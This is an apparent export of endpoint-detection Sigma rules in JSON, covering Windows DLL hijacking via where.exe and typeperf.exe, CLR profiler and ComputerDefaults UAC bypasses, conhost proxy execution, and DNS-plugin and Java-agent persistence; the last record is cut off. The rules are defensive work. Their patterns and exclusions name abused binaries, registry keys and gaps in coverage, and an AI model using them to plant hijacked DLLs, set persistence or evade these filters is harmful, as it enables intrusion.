"id": "b8b3c0b9-820c-4cbc-bf8f-8e9dc817b174",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618740Z",
"creation_date": "2026-03-23T11:45:34.618742Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618746Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_where.yml",
"content": "title: DLL Hijacking via where.exe\nid: b8b3c0b9-820c-4cbc-bf8f-8e9dc817b174\ndescription: |\n Detects potential Windows DLL Hijacking via where.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'where.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b8b3c0b9-820c-4cbc-bf8f-8e9dc817b174",
"rule_name": "DLL Hijacking via where.exe",
"rule_description": "Detects potential Windows DLL Hijacking via where.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b8b6c756-7a89-4467-98c8-c1a76e73899f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610691Z",
"creation_date": "2026-03-23T11:45:34.610695Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610702Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://offsec.almond.consulting/UAC-bypass-dotnet.html",
"https://redcanary.com/blog/blue-mockingbird-cryptominer/",
"https://attack.mitre.org/techniques/T1574/012/"
],
"name": "t1574_012_clr_profiler_environment_variable_modification.yml",
"content": "title: .NET CLR Profiler Changed in User Environment\nid: b8b6c756-7a89-4467-98c8-c1a76e73899f\ndescription: |\n Detects the COR_PROFILER or COR_PROFILER_PATH user environment variable being modified\n This variable should not be normally defined in the user environment variables.\n This can be related to an UAC bypass on a CLR elevated application (like mmc).\n It is recommended to check the origin and legitimacy of the application performing this modification.\nreferences:\n - https://offsec.almond.consulting/UAC-bypass-dotnet.html\n - https://redcanary.com/blog/blue-mockingbird-cryptominer/\n - https://attack.mitre.org/techniques/T1574/012/\ndate: 2020/10/26\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1574.012\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set:\n EventType: 'SetValue'\n TargetObject:\n - 'HKU\\\\*\\Environment\\COR_PROFILER'\n - 'HKU\\\\*\\Environment\\COR_PROFILER_PATH'\n filter_empty:\n Details: '(Empty)'\n selection_rename:\n EventType:\n - 'RenameValue'\n - 'RenameKey'\n NewName:\n - 'HKU\\\\*\\Environment\\COR_PROFILER'\n - 'HKU\\\\*\\Environment\\COR_PROFILER_PATH'\n\n condition: (selection_set and not filter_empty) or selection_rename\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b8b6c756-7a89-4467-98c8-c1a76e73899f",
"rule_name": ".NET CLR Profiler Changed in User Environment",
"rule_description": "Detects the COR_PROFILER or COR_PROFILER_PATH user environment variable being modified\nThis variable should not be normally defined in the user environment variables.\nThis can be related to an UAC bypass on a CLR elevated application (like mmc).\nIt is recommended to check the origin and legitimacy of the application performing this modification.\n",
"rule_creation_date": "2020-10-26",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1574.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b8e64347-bbc6-4698-b322-4fa2b28bfe9a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627071Z",
"creation_date": "2026-03-23T11:45:34.627073Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627077Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/",
"https://attack.mitre.org/techniques/T1202/"
],
"name": "t1202_indirect_command_execution_conhost.yml",
"content": "title: Indirect Command Executed via conhost.exe\nid: b8e64347-bbc6-4698-b322-4fa2b28bfe9a\ndescription: |\n Detects a suspicious execution of legitimate conhost.exe Windows binary, used to provide an interface between the Command Prompt and the Windows Explorer.\n Attackers can proxy the execution of commands through conhost.exe to bypass application control or security solutions.\n It is recommended to analyze the actions performed by the spawned process and to look for other malicious actions on the host.\nreferences:\n - https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/\n - https://attack.mitre.org/techniques/T1202/\ndate: 2022/01/21\nmodified: 2026/02/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1202\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\conhost.exe'\n\n exclusion_sshd:\n GrandparentImage|endswith:\n - '\\sshd.exe'\n - '\\sshd-session.exe'\n # C:\\Windows\\system32\\conhost.exe --headless --width 172 --height 14 --signal 0x1f8 -- \"c:\\windows\\system32\\cmd.exe\"\n ParentCommandLine|contains|all:\n - ' --headless '\n - ' --width '\n - ' --height '\n - ' --signal '\n - ' -- '\n\n exclusion_ctfmon:\n Image: '?:\\Windows\\System32\\ctfmon.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_conhost:\n Image: '?:\\Windows\\System32\\conhost.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_conhost_parent:\n ParentCommandLine:\n # \\??\\C:\\windows\\system32\\conhost.exe 0xffffffff -ForceV1\n # \\??\\C:\\WINDOWS\\system32\\conhost.exe 0x4\n - '\\\\\\?\\?\\\\?:\\windows\\system32\\conhost.exe 0xffffffff -ForceV1'\n - '\\\\\\?\\?\\\\?:\\WINDOWS\\system32\\conhost.exe 0x4'\n\n exclusion_werfault:\n Image: '?:\\Windows\\System32\\WerFault.exe'\n CommandLine|contains: '\\WerFault.exe -u -p '\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_terminal:\n # https://devblogs.microsoft.com/commandline/new-experimental-console-features/\n # C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe --single-argument https://go.microsoft.com/fwlink/?linkid=2028595\n # C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe --single-argument https://go.microsoft.com/fwlink/?linkid=2028595\n # C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe -osint -url https://go.microsoft.com/fwlink/?LinkId=507549\n # C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe -osint -url https://go.microsoft.com/fwlink/?LinkId=871150\n CommandLine|endswith:\n - ' --single-argument https://go.microsoft.com/fwlink/?linkid=*'\n - ' -osint -url https://go.microsoft.com/fwlink/?LinkId=*'\n\n exclusion_alert:\n Image:\n - '?:\\Program Files (x86)\\LANDesk\\Shared Files\\alert.exe'\n - '?:\\Program Files\\LANDesk\\Shared Files\\alert.exe'\n Signed: 'true'\n Signature: 'Ivanti, Inc.'\n\n exclusion_ibm:\n Image: '*\\Start_Programs\\Windows_*\\acslaunch_win*.exe'\n Signed: 'true'\n Signature: 'International Business Machines Corporation'\n\n exclusion_rdm:\n ProcessGrandparentImage: '?:\\Program Files\\Devolutions\\Remote Desktop Manager\\RemoteDesktopManager.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Devolutions Inc'\n\n # https://github.com/asheroto/winget-install/blob/master/winget-install.ps1#L880\n # https://github.com/Romanitho/Winget-Install\n exclusion_winget:\n - CommandLine:\n - 'powershell.exe -NoProfile -ExecutionPolicy Bypass -File winget-notify.ps1'\n - 'powershell.exe -NoProfile -ExecutionPolicy Bypass -File winget-upgrade.ps1'\n - 'schtasks /run /tn WAU\\Winget-AutoUpdate'\n - ProcessGrandparentImage: '?:\\Program Files\\Winget-AutoUpdate\\ServiceUI.exe'\n\n exclusion_malightingtechnology:\n Image: '?:\\Program Files\\MALightingTechnology\\\\*\\bin\\app_system.exe'\n\n # https://github.com/abbodi1406/BatUtil/blob/master/OfficeScrubber/OfficeScrubber.cmd#L133\n exclusion_officescrubber:\n ProcessParentCommandLine|startswith: 'conhost.exe powershell -nop -c $t=[AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0);'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b8e64347-bbc6-4698-b322-4fa2b28bfe9a",
"rule_name": "Indirect Command Executed via conhost.exe",
"rule_description": "Detects a suspicious execution of legitimate conhost.exe Windows binary, used to provide an interface between the Command Prompt and the Windows Explorer.\nAttackers can proxy the execution of commands through conhost.exe to bypass application control or security solutions.\nIt is recommended to analyze the actions performed by the spawned process and to look for other malicious actions on the host.\n",
"rule_creation_date": "2022-01-21",
"rule_modified_date": "2026-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1202"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b93f0ab6-c9b8-4459-9d13-f40136d92136",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074484Z",
"creation_date": "2026-03-23T11:45:34.074486Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074491Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/",
"https://any.run/cybersecurity-blog/windows11-uac-bypass/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_post_uac_bypass_computerdefaults.yml",
"content": "title: UAC Bypass Executed via ComputerDefaults\nid: b93f0ab6-c9b8-4459-9d13-f40136d92136\ndescription: |\n Detects a process being spawned by computerdefaults.exe, that can be the result of an UAC bypass via ComputerDefaults.\n ComputerDefaults has autoelevation capabilities and an integrity level of high.\n This is the result of an attack against a ShellExecuteW(\\\"ms-settings:defaultapps\\\") call inside computerdefaults.exe.\n As such, you should look for other alerts related to ms-settings.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/\n - https://any.run/cybersecurity-blog/windows11-uac-bypass/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/10/12\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - ParentImage|endswith: '\\computerdefaults.exe'\n - ProcessFakeParentImage: '?:\\Windows\\System32\\ComputerDefaults.exe'\n\n exclusion_fp:\n CommandLine:\n - '?:\\windows\\system32\\ie4uinit.exe -reinstall'\n - '?:\\windows\\system32\\unregmp2.exe /setwmpasdefault'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b93f0ab6-c9b8-4459-9d13-f40136d92136",
"rule_name": "UAC Bypass Executed via ComputerDefaults",
"rule_description": "Detects a process being spawned by computerdefaults.exe, that can be the result of an UAC bypass via ComputerDefaults.\nComputerDefaults has autoelevation capabilities and an integrity level of high.\nThis is the result of an attack against a ShellExecuteW(\\\"ms-settings:defaultapps\\\") call inside computerdefaults.exe.\nAs such, you should look for other alerts related to ms-settings.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2020-10-12",
"rule_modified_date": "2025-01-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b9479cc4-206c-42ef-a445-6484a31ec6ed",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089294Z",
"creation_date": "2026-03-23T11:45:34.089296Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089300Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://adsecurity.org/?p=4064",
"https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83"
],
"name": "t1112_persistence_registry_dns_serverlevelplugindll.yml",
"content": "title: DNS Server ServerLevelPluginDll Persistence Added\nid: b9479cc4-206c-42ef-a445-6484a31ec6ed\ndescription: |\n Detects the installation of a potentially malicious DNS server plugin DLL.\n After restarting the DNS service, this DLL is loaded in the context of the DNS server and code execution is achieved.\n It is recommended to investigate the process which set the registry key and download the DLL added for further analysis.\nreferences:\n - https://adsecurity.org/?p=4064\n - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83\ndate: 2020/10/02\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.ActiveDirectory\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n - EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\ServerLevelPluginDll'\n - EventType: RenameKey\n NewName: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\ServerLevelPluginDll'\n filter_empty:\n Details: '(Empty)'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b9479cc4-206c-42ef-a445-6484a31ec6ed",
"rule_name": "DNS Server ServerLevelPluginDll Persistence Added",
"rule_description": "Detects the installation of a potentially malicious DNS server plugin DLL.\nAfter restarting the DNS service, this DLL is loaded in the context of the DNS server and code execution is achieved.\nIt is recommended to investigate the process which set the registry key and download the DLL added for further analysis.\n",
"rule_creation_date": "2020-10-02",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b99d0522-5e3d-4809-93e1-d57677eedec3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088865Z",
"creation_date": "2026-03-23T11:45:34.088867Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088882Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.hexacorn.com/blog/2017/09/27/beyond-good-ol-run-key-part-65/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1546_java_agent_persistence.yml",
"content": "title: Possible Java AgentLib/AgentPath Persistence Added\nid: b99d0522-5e3d-4809-93e1-d57677eedec3\ndescription: |\n Detect a suspicious registry changes in the environment variables related to a Java persistence technique.\n This binary, which is digitally signed by Oracle, can be used to load malicious DLLs whose path was written in the registry.\n Attackers may use it to bypass security restrictions as Java is usually a trusted binary. DLL execution happens each time Java is started on the infected system.\n It is recommended to determine if malicious DLLs are being executed upon Java startup, assess the integrity of the Java binary, and monitor for associated suspicious processes.\nreferences:\n - https://www.hexacorn.com/blog/2017/09/27/beyond-good-ol-run-key-part-65/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/12/08\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKU\\\\*\\Environment\\JAVA_TOOL_OPTIONS'\n - 'HKU\\\\*\\Environment\\_JAVA_OPTIONS'\n - 'HKU\\\\*\\Environment\\IBM_JAVA_OPTIONS'\n Details|contains:\n - '-agentpath:'\n - '-agentlib:'\n\n condition: selection\nlevel: medium\n#level: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b99d0522-5e3d-4809-93e1-d57677eedec3",
"rule_name": "Possible Java AgentLib/AgentPath Persistence Added",
"rule_description": "Detect a suspicious registry changes in the environment variables related to a Java persistence technique.\nThis binary, which is digitally signed by Oracle, can be used to load malicious DLLs whose path was written in the registry.\nAttackers may use it to bypass security restrictions as Java is usually a trusted binary. DLL execution happens each time Java is started on the infected system.\nIt is recommended to determine if malicious DLLs are being executed upon Java startup, assess the integrity of the Java binary, and monitor for associated suspicious processes.\n",
"rule_creation_date": "2022-12-08",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b9b26f66-0e18-4a6b-9416-29c52ccd4a3d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599465Z",
"creation_date": "2026-03-23T11:45:34.599468Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599476Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_typeperf.yml",
"content": "title: DLL Hijacking via typeperf.exe\nid: b9b26f66-0e18-4a6b-9416-29c52ccd4a3d\ndescription: |\n Detects potential Windows DLL Hijacking via typeperf.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'typeperf.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\pdh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b9b26f66-0e18-4a6b-9416-29c52ccd4a3d",
"rule_name": "DLL Hijacking via typeperf.exe",
"rule_description": "Detects potential Windows DLL Hijacking via typeperf.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b9ba963c-9b27-4458-84b7-c2de9615e0ce",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613100Z",
"creation_date": "2026-03-23T11:45:34.613103Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613111Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.bpfdoor",
"https://dfir.ch/posts/strace/",
"https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor",
"https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
"https://attack.mitre.org/techniques/T1559/"
],
